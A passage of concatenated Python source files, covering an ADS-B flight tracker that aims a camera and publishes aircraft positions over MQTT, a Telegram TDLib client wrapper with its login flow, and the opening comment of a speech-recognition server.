self.__track = sbs1msg["track"]
if sbs1msg["onGround"] is not None:
self.__onGround = sbs1msg["onGround"]
if sbs1msg["lat"] is not None:
self.__lat = sbs1msg["lat"]
self.__latLonTime = sbs1msg["generatedDate"]
if sbs1msg["lon"] is not None:
self.__lon = sbs1msg["lon"]
self.__latLonTime = sbs1msg["generatedDate"]
if sbs1msg["verticalRate"] is not None:
self.__verticalRate = sbs1msg["verticalRate"]
if not self.__verticalRate:
self.__verticalRate = 0
if self.__lat and self.__lon and self.__altitude and self.__track:
# Calculates the distance from the cameras location to the airplane. The output is in METERS!
distance3d = utils.coordinate_distance_3d(camera_latitude, camera_longitude, camera_altitude, self.__lat, self.__lon, self.__altitude)
distance2d = utils.coordinate_distance(camera_latitude, camera_longitude, self.__lat, self.__lon )
self.__distance = distance3d
self.__bearing = utils.bearingFromCoordinate(cameraPosition=[camera_latitude, camera_longitude], airplanePosition=[self.__lat, self.__lon], heading=self.__track)
self.__elevation = utils.elevation(distance2d, cameraAltitude=camera_altitude, airplaneAltitude=self.__altitude) # Distance and Altitude are both in meters
# Check if observation was updated
newData = dict(self.__dict__)
#del oldData["_Observation__loggedDate"]
#del newData["_Observation__loggedDate"]
d = DictDiffer(oldData, newData)
self.__updated = len(d.changed()) > 0
def getIcao24(self) -> str:
return self.__icao24
def getLat(self) -> float:
return self.__lat
def getLon(self) -> float:
return self.__lon
def isUpdated(self) -> bool:
return self.__updated
def getElevation(self) -> int:
return self.__elevation
def getDistance(self) -> int:
return self.__distance
def getLoggedDate(self) -> datetime:
return self.__loggedDate
def getLatLonTime(self) -> datetime:
return self.__latLonTime
def getAltitudeTime(self) -> datetime:
return self.__altitudeTime
def getGroundSpeed(self) -> float:
return self.__groundSpeed
def getTrack(self) -> float:
return self.__track
def getOnGround(self) -> bool:
return self.__onGround
def getAltitude(self) -> float:
if self.getOnGround():
self.__altitude = camera_altitude
return self.__altitude
def getType(self) -> str:
return self.__type
def getManufacturer(self) -> str:
return self.__manufacturer
def getModel(self) -> str:
return self.__model
def getRegistration(self) -> str:
return self.__registration
def getOperator(self) -> str:
return self.__operator
def getRoute(self) -> str:
return self.__route
def getVerticalRate(self) -> float:
return self.__verticalRate
def isPresentable(self) -> bool:
return self.__altitude and self.__groundSpeed and self.__track and self.__lat and self.__lon and self.__distance
def dump(self):
"""Dump this observation on the console
"""
now = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')
logging.debug("> %s %s %-7s - trk:%3d spd:%3d alt:%5d (%5d) %.4f, %.4f" % (now, self.__icao24, self.__callsign, self.__track, self.__groundSpeed, self.__altitude, self.__verticalRate, self.__lat, self.__lon))
def json(self) -> str:
"""Return JSON representation of this observation
Arguments:
bearing {float} -- bearing to observation in degrees
distance {int} -- distance to observation in meters
Returns:
str -- JSON string
"""
if self.__callsign is None:
callsign = "None"
else:
callsign = "%s" % self.__callsign
planeDict = {"verticalRate": self.__verticalRate, "time": time.time(), "lat": self.__lat, "lon": self.__lon, "altitude": self.__altitude, "groundSpeed": self.__groundSpeed, "icao24": self.__icao24, "registration": self.__registration, "track": self.__track, "operator": self.__operator, "loggedDate": self.__loggedDate, "type": self.__type, "latLonTime": self.__latLonTime, "altitudeTime": self.__altitudeTime, "manufacturer": self.__manufacturer, "model": self.__model, "callsign": callsign, "bearing": self.__bearing, "distance": self.__distance, "elevation": self.__elevation}
jsonString = json.dumps(planeDict, indent=4, sort_keys=True, default=str)
return jsonString
def dict(self):
d = dict(self.__dict__)
if d["_Observation__verticalRate"] == None:
d["verticalRate"] = 0
if "_Observation__lastAlt" in d:
del d["lastAlt"]
if "_Observation__lastLat" in d:
del d["lastLat"]
if "_Observation__lastLon" in d:
del d["lastLon"]
return d
def update_config(config):
""" Adjust configuration values based on MQTT config messages that come in """
global camera_lead
global min_elevation
global min_distance
global min_altitude
global min_elevation
global max_altitude
global max_distance
global aircraft_pinned
if "cameraLead" in config:
camera_lead = float(config["cameraLead"])
logging.info("Setting Camera Lead to: {}".format(camera_lead))
if "minElevation" in config:
min_elevation = int(config["minElevation"])
logging.info("Setting Min. Elevation to: {}".format(min_elevation))
if "minDistance" in config:
min_distance = int(config["minDistance"])
logging.info("Setting Min. Distance to: {}".format(min_distance))
if "minAltitude" in config:
min_altitude = int(config["minAltitude"])
logging.info("Setting Min. Altitude to: {}".format(min_altitude))
if "maxAltitude" in config:
max_altitude = int(config["maxAltitude"])
logging.info("Setting Max Altitude to: {}".format(max_altitude))
if "maxDistance" in config:
max_distance = int(config["maxDistance"])
logging.info("Setting Max Distance to: {}".format(min_elevation))
if "aircraftPinned" in config:
aircraft_pinned = config["aircraftPinned"].lower()
logging.info("Pinning Aircraft to: {}".format(aircraft_pinned))
def on_message(client, userdata, message):
""" MQTT Client callback for new messages """
global camera_altitude
global camera_latitude
global camera_longitude
command = str(message.payload.decode("utf-8"))
# Assumes you will only be getting JSON on your subscribed messages
try:
update = json.loads(command)
except JSONDecodeError as e:
logging.critical("onMessage - JSONDecode Error: {} ".format(e))
except TypeError as e:
logging.critical("onMessage - Type Error: {} ".format(e))
except ValueError as e:
logging.critical("onMessage - Value Error: {} ".format(e))
except:
logging.critical("onMessage - Caught it!")
if message.topic == "skyscan/egi":
#logging.info(update)
camera_longitude = float(update["long"])
camera_latitude = float(update["lat"])
camera_altitude = float(update["alt"])
elif message.topic == config_topic:
update_config(update)
logging.info("Config Message: {}".format(update))
else:
logging.info("Topic not processed: " + message.topic)
class FlightTracker(object):
__mqtt_broker: str = ""
__mqtt_port: int = 0
__plane_topic: str = None
__flight_topic: str = None
__client = None
__observations: Dict[str, str] = {}
__tracking_icao24: str = None
__tracking_distance: int = 999999999
__next_clean: datetime = None
__has_nagged: bool = False
__dump1090_host: str = ""
__dump1090_port: int = 0
__dump1090_sock: socket.socket = None
def __init__(self, dump1090_host: str, mqtt_broker: str, plane_topic: str, flight_topic: str, dump1090_port: int = 30003, mqtt_port: int = 1883, ):
"""Initialize the flight tracker
Arguments:
dump1090_host {str} -- Name or IP of dump1090 host
mqtt_broker {str} -- Name or IP of dump1090 MQTT broker
latitude {float} -- Latitude of receiver
longitude {float} -- Longitude of receiver
plane_topic {str} -- MQTT topic for plane reports
flight_topic {str} -- MQTT topic for current tracking report
Keyword Arguments:
dump1090_port {int} -- Override the dump1090 raw port (default: {30003})
mqtt_port {int} -- Override the MQTT default port (default: {1883})
"""
self.__dump1090_host = dump1090_host
self.__dump1090_port = dump1090_port
self.__mqtt_broker = mqtt_broker
self.__mqtt_port = mqtt_port
self.__sock = None
self.__observations = {}
self.__next_clean = datetime.utcnow() + timedelta(seconds=OBSERVATION_CLEAN_INTERVAL)
self.__plane_topic = plane_topic
self.__flight_topic = flight_topic
def __getObservationJson(self, observation):
(lat, lon, alt) = utils.calc_travel_3d(observation.getLat(), observation.getLon(), observation.getAltitude(), observation.getLatLonTime(), observation.getAltitudeTime(), observation.getGroundSpeed(), observation.getTrack(), observation.getVerticalRate(), camera_lead)
distance3d = utils.coordinate_distance_3d(camera_latitude, camera_longitude, camera_altitude, lat, lon, alt)
#(latorig, lonorig) = utils.calc_travel(observation.getLat(), observation.getLon(), observation.getLatLonTime(), observation.getGroundSpeed(), observation.getTrack(), camera_lead)
distance2d = utils.coordinate_distance(camera_latitude, camera_longitude, lat, lon)
bearing = utils.bearingFromCoordinate( cameraPosition=[camera_latitude, camera_longitude], airplanePosition=[lat, lon], heading=observation.getTrack())
elevation = utils.elevation(distance2d, cameraAltitude=camera_altitude, airplaneAltitude=alt)
cameraTilt = elevation
cameraPan = utils.cameraPanFromCoordinate(cameraPosition=[camera_latitude, camera_longitude], airplanePosition=[lat, lon])
#elevationorig = utils.elevation(distance2d, observation.getAltitude(), camera_altitude)
return observation.json()
def __publish_thread(self):
"""
MQTT publish closest observation every second, more often if the plane is closer
"""
timeHeartbeat = 0
notTrackingJson = "{}"
while True:
# Checks to see if it is time to publish a hearbeat message
if timeHeartbeat < time.mktime(time.gmtime()):
timeHeartbeat = time.mktime(time.gmtime()) + 10
self.__client.publish("skyscan/heartbeat", "skyscan-tracker-" +ID+" Heartbeat", 0, False)
# if we are not tracking anything, goto sleep for 1 second
if not self.__tracking_icao24:
retain = False
self.__client.publish(self.__flight_topic, notTrackingJson, 0, retain)
time.sleep(1)
else:
# Check to see if the currently tracked airplane is in the observations
if not self.__tracking_icao24 in self.__observations:
self.__tracking_icao24 = None
continue
cur = self.__observations[self.__tracking_icao24]
if cur is None:
continue
retain = False
self.__client.publish(self.__flight_topic, cur.json(), 0, retain)
if self.__tracking_distance < 3000:
time.sleep(0.25)
elif self.__tracking_distance < 6000:
time.sleep(0.5)
else:
time.sleep(1)
def __whyTrackable(self, observation) -> str:
""" Returns a string explaining why a Plane can or cannot be tracked """
reason = ""
if observation.getAltitude() == None or observation.getGroundSpeed() == None or observation.getTrack() == None or observation.getLat() == None or observation.getLon() == None:
reason = "Loc: ⛔️"
else:
reason = "Loc: ✅"
if observation.getOnGround() == True:
reason = reason + "\tGrnd: ⛔️"
else:
reason = reason + "\tGrnd: ✅"
if max_altitude != None and observation.getAltitude() > max_altitude:
reason = reason + "\tMax Alt: ⛔️"
else:
reason = reason + "\tMax Alt: ✅"
if min_altitude != None and observation.getAltitude() < min_altitude:
reason = reason + "\tMin Alt: ⛔️"
else:
reason = reason + "\tMin Alt: ✅"
if observation.getDistance() == None or observation.getElevation() == None:
return False
if min_distance != None and observation.getDistance() < min_distance:
reason = reason + "\tMin Dist: ⛔️"
else:
reason = reason + "\tMin Dist: ✅"
if max_distance != None and observation.getDistance() > max_distance:
reason = reason + "\tMax Dist: ⛔️"
else:
reason = reason + "\tMax Dist: ✅"
if observation.getElevation() < min_elevation:
reason = reason + "\tMin Elv: ⛔️"
else:
reason = reason + "\tMin Elv: ✅"
return reason
def __isTrackable(self, observation) -> bool:
""" Does this observation meet all of the requirements to be tracked """
if observation.getAltitude() == None or observation.getGroundSpeed() == None or observation.getTrack() == None or observation.getLat() == None or observation.getLon() == None:
return False
if observation.getOnGround() == True:
return False
if max_altitude != None and observation.getAltitude() > max_altitude:
return False
if min_altitude != None and observation.getAltitude() < min_altitude:
return False
if observation.getDistance() == None or observation.getElevation() == None:
return False
if min_distance != None and observation.getDistance() < min_distance:
return False
if max_distance != None and observation.getDistance() > max_distance:
return False
if observation.getElevation() < min_elevation:
return False
return True
def __updateTrackingDistance(self):
"""Update distance to aircraft being tracked
"""
cur = self.__observations[self.__tracking_icao24]
if cur.getAltitude():
self.__tracking_distance = utils.coordinate_distance_3d(camera_latitude, camera_longitude, camera_altitude, cur.getLat(), cur.getLon(), cur.getAltitude())
def __observationKey(self,obs):
return int(obs["_Observation__distance"])
def getObservations(self):
items=[]
for icao24 in self.__observations:
if self.__observations[icao24].isPresentable():
items.append(self.__observations[icao24].dict())
items.sort(key=self.__observationKey)
return items
def getTracking(self):
return self.__tracking_icao24
def getTrackingObservation(self):
return self.__getObservationJson(self.__observations[self.__tracking_icao24])
def dump1090Connect(self) -> bool:
"""If not connected, connect to the dump1090 host
Returns:
bool -- True if we are connected
"""
if self.__dump1090_sock == None:
try:
if not self.__has_nagged:
logging.info("Connecting to dump1090")
self.__dump1090_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__dump1090_sock.connect((self.__dump1090_host, self.__dump1090_port))
logging.info("ADSB connected")
self.__dump1090_sock.settimeout(DUMP1090_SOCKET_TIMEOUT)
self.__has_nagged = False
return True
except socket.error as e:
if not self.__has_nagged:
logging.critical("Failed to connect to ADSB receiver on %s:%s, retrying : %s" % (self.__dump1090_host, self.__dump1090_port, e))
self.__has_nagged = True
self.__dump1090_sock = None
time.sleep(5)
return False
else:
return True
def dump1090Close(self):
"""Close connection to dump1090 host.
"""
try:
self.__dump1090_sock.close()
except socket.error:
pass
self.__dump1090_sock = None
self.__has_nagged = False
logging.critical("Closing dump1090 connection")
def dump1090Read(self) -> str:
"""Read a line from the dump1090 host. If the host went down, close the socket and return None
Returns:
str -- An SBS1 message or None if disconnected or timeout
Yields:
str -- An SBS1 message or None if disconnected or timeout
"""
try:
try:
buffer = self.__dump1090_sock.recv(4096)
except ConnectionResetError:
logging.critical("Connection Reset Error")
self.dump1090Close()
return None
except socket.error:
logging.critical("Socket Error")
self.dump1090Close()
return None
buffer = buffer.decode("utf-8")
buffering = True
if buffer == "":
logging.critical("Buffer Empty")
self.dump1090Close()
return None
while buffering:
if "\n" in buffer:
(line, buffer) = buffer.split("\r\n", 1)
yield line
else:
try:
more = self.__dump1090_sock.recv(4096)
except ConnectionResetError:
logging.critical("Connection Reset Error")
self.dump1090Close()
return None
except socket.error:
logging.critical("Socket Error")
self.dump1090Close()
return None
if not more:
buffering = False
else:
if not isinstance(more, str):
more = more.decode("utf-8")
if more == "":
logging.critical("Receive Empty")
self.dump1090Close()
return None
buffer += more
if buffer:
yield buffer
except socket.timeout:
return None
def run(self):
"""Run the flight tracker.
"""
global aircraft_pinned
print("connecting to MQTT broker at "+ self.__mqtt_broker +", subcribing on channel '"+ self.__plane_topic+"'publising on: " + self.__flight_topic)
self.__client = mqtt.Client("skyscan-tracker-" + ID) #create new instance
self.__client.on_message = on_message #attach function to callback
print("setup MQTT")
self.__client.connect(self.__mqtt_broker) #connect to broker
print("connected mqtt")
self.__client.loop_start() #start the loop
print("start MQTT")
self.__client.subscribe("skyscan/egi")
self.__client.subscribe(config_topic)
self.__client.publish("skyscan/registration", "skyscan-tracker-"+ID+" Registration", 0, False)
print("subscribe mqtt")
threading.Thread(target = self.__publish_thread, daemon = True).start()
# This loop reads in new messages from dump1090 and determines which plane to track
while True:
if not self.dump1090Connect():
continue
for data in self.dump1090Read():
if data is None:
continue
self.cleanObservations()
m = sbs1.parse(data)
if m:
icao24 = m["icao24"].lower()
# Add or update the Observation for the plane
if icao24 not in self.__observations:
self.__observations[icao24] = Observation(m)
else:
self.__observations[icao24].update(m)
if bool(aircraft_pinned) & (aircraft_pinned not in self.__observations):
aircraft_pinned = None
# if the pinned_aircraft variable is set and that the plane is the pinned aircraft
if (bool(aircraft_pinned)) & (icao24 == aircraft_pinned):
if aircraft_pinned != self.__tracking_icao24:
self.__tracking_icao24 = icao24
self.__updateTrackingDistance()
logging.info("{}\t[PINNED AIRCRAFT TRACKING]\tDist: {}\tElev: {}\t\t".format(self.__tracking_icao24, self.__tracking_distance, self.__observations[icao24].getElevation()))
else:
self.__updateTrackingDistance()
# if the plane is suitable to be tracked
elif (not bool(aircraft_pinned)) & self.__isTrackable(self.__observations[icao24]):
# if no plane is being tracked, track this one
if not self.__tracking_icao24:
self.__tracking_icao24 = icao24
self.__updateTrackingDistance()
logging.info("{}\t[TRACKING]\tDist: {}\tElev: {}\t\t".format(self.__tracking_icao24, self.__tracking_distance, self.__observations[icao24].getElevation()))
# if this is the plane being tracked, update the tracking distance
elif self.__tracking_icao24 == icao24:
self.__updateTrackingDistance()
# This plane is trackable, but is not the one being tracked
else:
distance = self.__observations[icao24].getDistance()
if distance < self.__tracking_distance:
self.__tracking_icao24 = icao24
self.__tracking_distance = distance
logging.info("{}\t[TRACKING]\tDist: {}\tElev: {}\t\t - Switched to closer plane".format(self.__tracking_icao24, int(self.__tracking_distance), int(self.__observations[icao24].getElevation())))
else:
# If the plane is currently being tracked, but is no longer trackable:
if self.__tracking_icao24 == icao24:
logging.info("%s\t[NOT TRACKING]\t - Observation is no longer trackable" % (icao24))
logging.info(self.__whyTrackable(self.__observations[icao24]))
self.__tracking_icao24 = None
self.__tracking_distance = 999999999
time.sleep(0.01)
def selectNearestObservation(self):
"""Select nearest presentable aircraft
"""
self.__tracking_icao24 = None
self.__tracking_distance = 999999999
for icao24 in self.__observations:
if not self.__isTrackable(self.__observations[icao24]):
continue
distance = self.__observations[icao24].getDistance()
if self.__observations[icao24].getDistance() < self.__tracking_distance:
self.__tracking_icao24 = icao24
self.__tracking_distance = distance
if self.__tracking_icao24:
logging.info("{}\t[TRACKING]\tDist: {}\t\t - Selected Nearest Observation".format(self.__tracking_icao24, self.__tracking_distance))
def cleanObservations(self):
global aircraft_pinned
"""Clean observations for planes not seen in a while
"""
now = datetime.utcnow()
if now > self.__next_clean:
cleaned = []
for icao24 in self.__observations:
# logging.info("[%s] %s -> %s : %s" % (icao24, self.__observations[icao24].getLoggedDate(), self.__observations[icao24].getLoggedDate() + timedelta(seconds=OBSERVATION_CLEAN_INTERVAL), now))
if self.__observations[icao24].getLoggedDate() + timedelta(seconds=OBSERVATION_CLEAN_INTERVAL) < now:
logging.info("%s\t[REMOVED]\t" % (icao24))
if icao24 == aircraft_pinned:
aircraft_pinned = None
logging.info("%s\t[REMOVED PINNED AIRCRAFT - REVERTING TO NORMAL TRACKING]\t" % (icao24))
if icao24 == self.__tracking_icao24:
self.__tracking_icao24 = None
self.__tracking_distance = 999999999
cleaned.append(icao24)
if icao24 == self.__tracking_icao24 and not self.__isTrackable(self.__observations[icao24]) and not aircraft_pinned:
logging.info("%s\t[NOT TRACKING]\t - Observation is no longer trackable" % (icao24))
logging.info(self.__whyTrackable(self.__observations[icao24]))
self.__tracking_icao24 = None
self.__tracking_distance = 999999999
for icao24 in cleaned:
del self.__observations[icao24]
if self.__tracking_icao24 is None:
self.selectNearestObservation()
self.__next_clean = now + timedelta(seconds=OBSERVATION_CLEAN_INTERVAL)
def getConfig():
config ={}
config["camera_altitude"] = camera_altitude
config["camera_latitude"] = camera_latitude
config["camera_longitude"] = camera_longitude
config["camera_lead"] = camera_lead
config["min_elevation"] = min_elevation
config["min_distance"] = min_distance
config["max_distance"] = max_distance
config["min_altitude"] = min_altitude
config["max_altitude"] = max_altitude
config["aircraft_pinned"] = aircraft_pinned
return config
@app.route('/')
def index():
return render_template('index.html', title='SkyScan', tracking=tracker.getTracking(), observations=tracker.getObservations(), config=getConfig())
def main():
global args
global logging
global camera_altitude
global camera_latitude
global camera_longitude
global camera_lead
global plane_topic
global min_elevation
global planes
global tracker
parser = argparse.ArgumentParser(description='A Dump 1090 to MQTT bridge')
parser.add_argument('-l', '--lat', type=float, help="Latitude of camera")
parser.add_argument('-L', '--lon', type=float, help="Longitude of camera")
parser.add_argument('-a', '--alt', type=float, help="altitude of camera in METERS!", default=0)
parser.add_argument('-c', '--camera-lead', type=float, help="how many seconds ahead of a plane's predicted location should the camera be positioned", default=0.25)
parser.add_argument('-M', '--min-elevation', type=int, help="minimum elevation for camera", default=0)
parser.add_argument('-m', '--mqtt-host', help="MQTT broker hostname", default='127.0.0.1')
parser.add_argument('-p', '--mqtt-port', type=int, help="MQTT broker port number (default 1883)", default=1883)
parser.add_argument('-P', '--plane-topic', dest='plane_topic', help="MQTT plane topic", default="skyscan/planes/json")
parser.add_argument('-T', '--flight-topic', dest='flight_topic', help="MQTT flight tracking topic", default="skyscan/flight/json")
parser.add_argument('-v', '--verbose', action="store_true", help="Verbose output")
parser.add_argument('-H', '--dump1090-host', help="dump1090 hostname", default='127.0.0.1')
parser.add_argument('--dump1090-port', type=int, help="dump1090 port number (default 30003)", default=30003)
args = parser.parse_args()
if not args.lat and not args.lon:
logging.critical("You really need to tell me where you are located (--lat and --lon)")
sys.exit(1)
camera_longitude = args.lon
camera_latitude = args.lat
camera_altitude = args.alt # Altitude is in METERS
plane_topic = args.plane_topic
camera_lead = args.camera_lead
min_elevation = args.min_elevation
level = logging.DEBUG if args.verbose else logging.INFO
styles = {'critical': {'bold': True, 'color': 'red'}, 'debug': {'color': 'green'}, 'error': {'color': 'red'}, 'info': {'color': 'white'}, 'notice': {'color': 'magenta'}, 'spam': {'color': 'green', 'faint': True}, 'success': {'bold': True, 'color': 'green'}, 'verbose': {'color': 'blue'}, 'warning': {'color': 'yellow'}}
level = logging.DEBUG if '-v' in sys.argv or '--verbose' in sys.argv else logging.INFO
if 1:
coloredlogs.install(level=level, fmt='%(asctime)s.%(msecs)03d \033[0;90m%(levelname)-8s '
''
'\033[0;36m%(filename)-18s%(lineno)3d\033[00m '
'%(message)s',
level_styles = styles)
else:
# Show process name
coloredlogs.install(level=level, fmt='%(asctime)s.%(msecs)03d \033[0;90m%(levelname)-8s '
'\033[0;90m[\033[00m \033[0;35m%(processName)-15s\033[00m\033[0;90m]\033[00m '
'\033[0;36m%(filename)s:%(lineno)d\033[00m '
'%(message)s')
logging.info("---[ Starting %s ]---------------------------------------------" % sys.argv[0])
planes = pd.read_csv("/data/aircraftDatabase.csv") #,index_col='icao24')
logging.info("Printing table")
logging.info(planes)
threading.Thread(target=app.run, kwargs={"host": '0.0.0.0', "port": 5000}).start()
tracker = FlightTracker(args.dump1090_host, args.mqtt_host, args.plane_topic, args.flight_topic,dump1090_port = args.dump1090_port, mqtt_port = args.mqtt_port)
tracker.run() # Never returns
# Ye ol main
if __name__ == "__main__":
try:
main()
except Exception as e:
logging.critical(e, exc_info=True)
|
client.py | import os
import time
import queue
import signal
import typing
import getpass
import logging
import threading
import json
from typing import Any, Dict, List, Type, Callable, Optional, DefaultDict
from collections import defaultdict
from pytglib import VERSION
from pytglib.utils import AsyncResult
from pytglib.tdjson import TDJson
from pytglib.worker import BaseWorker, SimpleWorker
from pytglib.api import Object
from pytglib.functions import Function
logger = logging.getLogger(__name__)
MESSAGE_HANDLER_TYPE: str = 'updateNewMessage'
RAW_UPDATE_HANDLER_TYPE: str = 'update'
DELETE_MESSAGES_HANDLER_TYPE: str = 'updateDeleteMessages'
class Telegram:
def __init__(
self,
library_path,
api_id: int,
api_hash: str,
database_encryption_key: str,
phone: str = None,
bot_token: str = None,
worker: Optional[Type[BaseWorker]] = None,
files_directory: str = None,
use_test_dc: bool = False,
use_message_database: bool = True,
device_model: str = 'python-telegram',
application_version: str = VERSION,
system_version: str = 'unknown',
system_language_code: str = 'en',
login: bool = False,
default_workers_queue_size=1000,
tdlib_verbosity: int = 2,
) -> None:
"""
Args:
api_id - ID of your app (https://my.pytglib.org/apps/)
api_hash - api_hash of your app (https://my.pytglib.org/apps/)
phone - your phone number
library_path - you can change path to the compiled libtdjson library
worker - worker to process updates
files_directory - directory for the tdlib's files (database, images, etc.)
use_test_dc - use test datacenter
use_message_database
device_model
application_version
system_version
system_language_code
"""
self.api_id = api_id
self.api_hash = api_hash
self.library_path = library_path
self.phone = phone
self.bot_token = bot_token
self.use_test_dc = use_test_dc
self.device_model = device_model
self.system_version = system_version
self.system_language_code = system_language_code
self.application_version = application_version
self.use_message_database = use_message_database
self._queue_put_timeout = 10
if not self.bot_token and not self.phone:
raise ValueError('You must provide bot_token or phone')
self._database_encryption_key = database_encryption_key
if not files_directory:
files_directory = f'/tmp/.tdlib_files/{self.phone}/'
self.files_directory = files_directory
self._authorized = False
self._is_enabled = False
# todo: move to worker
self._workers_queue: queue.Queue = queue.Queue(
maxsize=default_workers_queue_size
)
if not worker:
worker = SimpleWorker
self.worker = worker(queue=self._workers_queue)
self._results: Dict[str, AsyncResult] = {}
self._update_handlers: DefaultDict[str, List[Callable]] = defaultdict(list)
self._tdjson = TDJson(library_path=library_path, verbosity=tdlib_verbosity)
self._run()
self.functions = Function(self)
if login:
self.login()
def __del__(self):
self.stop()
def stop(self) -> None:
"""Stops the client"""
self._is_enabled = False
if hasattr(self, '_tdjson'):
self._tdjson.stop()
def call_method(self, method_name: str, params: Optional[Dict[str, Any]] = None):
data = {'@type': method_name}
if params:
data.update(params)
return self._send_data(data)
def _run(self):
self._is_enabled = True
self._td_listener = threading.Thread(target=self._listen_to_td)
self._td_listener.daemon = True
self._td_listener.start()
self.worker.run()
def _listen_to_td(self):
logger.info('[pytglib.td_listener] started')
while self._is_enabled:
update = self._tdjson.receive()
if update:
self._update_async_result(update)
self._run_handlers(update)
def _update_async_result(self, update: dict) -> typing.Optional[AsyncResult]:
async_result = None
_special_types = (
'updateAuthorizationState',
) # for authorizationProcess @extra.request_id doesn't work
if update.get('@type') in _special_types:
request_id = update['@type']
else:
request_id = update.get('@extra', {}).get('request_id')
if not request_id:
logger.debug('request_id has not been found in the update')
else:
async_result = self._results.get(request_id)
if not async_result:
logger.debug(
'async_result has not been found in by request_id=%s', request_id
)
else:
async_result.parse_update(update)
self._results.pop(request_id, None)
return async_result
def _run_handlers(self, update: Dict[Any, Any]) -> None:
update_type: str = update.get('@type', 'unknown')
for handler in self._update_handlers[update_type]:
self._workers_queue.put((handler, update), timeout=self._queue_put_timeout)
for handler in self._update_handlers[RAW_UPDATE_HANDLER_TYPE]:
self._workers_queue.put((handler, update), timeout=self._queue_put_timeout)
def add_message_handler(self, func: Callable) -> None:
"""
Adds function to handle all incoming messages
Args:
func (:obj:`Callable`):
Message handler function
"""
self.add_update_handler(MESSAGE_HANDLER_TYPE, func)
def add_raw_update_handler(self, func: Callable) -> None:
"""
Adds function to handle all incoming updates
Args:
func (:obj:`Callable`):
Update handler function
"""
self.add_update_handler(RAW_UPDATE_HANDLER_TYPE, func)
def add_delete_messages_handler(self, func: Callable) -> None:
"""
Adds function to handle deleted messages
Args:
func (:obj:`Callable`):
Deleted messages handler function
"""
self.add_update_handler(DELETE_MESSAGES_HANDLER_TYPE, func)
def add_update_handler(self, handler_type: str, func: Callable) -> None:
"""
Adds function to handle custom type of updates
Args:
handler_type (:obj:`str`):
Update type name
For example updateNewMessage
func (:obj:`Callable`):
Handler function
"""
if func not in self._update_handlers[handler_type]:
self._update_handlers[handler_type].append(func)
def _send_data(self, data: dict, result_id: str = None) -> AsyncResult:
if '@extra' not in data:
data['@extra'] = {}
if not result_id and 'request_id' in data['@extra']:
result_id = data['@extra']['request_id']
async_result = AsyncResult(client=self, result_id=result_id)
data['@extra']['request_id'] = async_result.id
self._tdjson.send(data)
self._results[async_result.id] = async_result
async_result.request = data
return async_result
def send(self, data: Object, result_id: str = None) -> AsyncResult:
data = json.loads(str(data))
if '@extra' not in data:
data['@extra'] = {}
if not result_id and 'request_id' in data['@extra']:
result_id = data['@extra']['request_id']
async_result = AsyncResult(client=self, result_id=result_id)
data['@extra']['request_id'] = async_result.id
self._tdjson.send(data)
self._results[async_result.id] = async_result
async_result.request = data
return async_result
def execute(self, data: Object) -> Object:
data = json.loads(str(data))
result = self._tdjson.td_execute(data)
return Object.read(result)
def idle(self, stop_signals=(signal.SIGINT, signal.SIGTERM, signal.SIGABRT)):
"""Blocks until one of the signals are received and stops"""
# for sig in stop_signals:
# signal.signal(sig, self._signal_handler)
self._is_enabled = True
while self._is_enabled:
time.sleep(0.1)
def _signal_handler(self, signum, frame):
self._is_enabled = False
def login(self):
"""
Login process (blocking)
Must be called before any other call. It sends initial params to the tdlib, sets database encryption key, etc.
"""
authorization_state = None
actions = {
None: self._send_encryption_key,
'authorizationStateWaitTdlibParameters': self._set_initial_params,
'authorizationStateWaitEncryptionKey': self._send_encryption_key,
'authorizationStateWaitPhoneNumber': self._send_phone_number_or_bot_token,
'authorizationStateWaitCode': self._send_telegram_code,
'authorizationStateWaitPassword': self._send_password,
'authorizationStateReady': self._complete_authorization,
}
if self.phone:
logger.info('[login] Login process has been started with phone')
else:
logger.info('[login] Login process has been started with bot token')
while not self._authorized:
logger.info('[login] current authorization state: %s', authorization_state)
result = actions[authorization_state]()
if result:
result.wait(raise_exc=False)
res = result.update
if not res:
# print(result.error_info)
if result.error_info['message'] == 'Database encryption key is needed:' \
' call checkDatabaseEncryptionKey first':
authorization_state = 'authorizationStateWaitEncryptionKey'
elif result.error_info['message'] == 'Initialization parameters are needed:' \
' call setTdlibParameters first':
authorization_state = 'authorizationStateWaitTdlibParameters'
else:
raise ValueError(str(result.error_info)) # TODO: Change to "Error" object
else:
authorization_state = res.authorization_state.ID
def _set_initial_params(self) -> AsyncResult:
logger.info(
'Setting tdlib initial params: files_dir=%s, test_dc=%s',
self.files_directory,
self.use_test_dc,
)
data = {
# todo: params
'@type': 'setTdlibParameters',
'parameters': {
'use_test_dc': self.use_test_dc,
'api_id': self.api_id,
'api_hash': self.api_hash,
'device_model': self.device_model,
'system_version': self.system_version,
'application_version': self.application_version,
'system_language_code': self.system_language_code,
'database_directory': os.path.join(self.files_directory, 'database'),
'use_message_database': self.use_message_database,
'files_directory': os.path.join(self.files_directory, 'files'),
},
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_encryption_key(self) -> AsyncResult:
logger.info('Sending encryption key')
data = {
'@type': 'checkDatabaseEncryptionKey',
'encryption_key': self._database_encryption_key,
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_phone_number_or_bot_token(self) -> AsyncResult:
"""Sends phone number or a bot_token"""
if self.phone:
return self._send_phone_number()
elif self.bot_token:
return self._send_bot_token()
else:
raise RuntimeError('Unknown mode: both bot_token and phone are None')
def _send_phone_number(self) -> AsyncResult:
logger.info('Sending phone number')
data = {
'@type': 'setAuthenticationPhoneNumber',
'phone_number': self.phone,
'allow_flash_call': False,
'is_current_phone_number': True,
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_bot_token(self) -> AsyncResult:
logger.info('Sending bot token')
data = {'@type': 'checkAuthenticationBotToken', 'token': self.bot_token}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_telegram_code(self) -> AsyncResult:
logger.info('Sending code')
code = input('Enter code:')
data = {'@type': 'checkAuthenticationCode', 'code': str(code)}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_password(self) -> AsyncResult:
logger.info('Sending password')
password = getpass.getpass('Password:')
data = {'@type': 'checkAuthenticationPassword', 'password': password}
return self._send_data(data, result_id='updateAuthorizationState')
def _complete_authorization(self) -> None:
logger.info('Completing auth process')
self._authorized = True
|
asr_server.py | #by marvin 2021.03.09
# simple speech recognition http api server
#
# WARNING:
# right now, this supports a single client only - needs a lot more work
# to become (at least somewhat) scalable
#
# Decode WAV Data
# ---------------
#
# * POST `/decode`
# * args (JSON encoded dict):
# * "audio" : array of signed int16 samples
